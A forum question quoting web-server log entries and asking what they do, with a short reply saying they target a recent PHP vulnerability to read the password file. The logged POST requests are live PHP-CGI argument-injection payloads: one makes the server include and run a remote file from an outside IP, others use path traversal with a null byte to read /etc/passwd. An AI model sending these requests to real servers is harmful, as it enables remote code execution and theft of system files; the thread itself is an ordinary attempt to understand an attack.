Answer the question
In order to leave comments, you need to log in
What do these requests to the server do?
Hello.
I looked through the logs of requests to the www server and found such an interesting POST request. Could you tell me what the author was trying to achieve?
"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n HTTP/1.1"
"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"
"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"
Answer the question
In order to leave comments, you need to log in
Looks like a relatively recent vulnerability (see comments ).
We tried to get the contents of the password file via the PHP instructions auto_prepend_file, allow_url_include.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question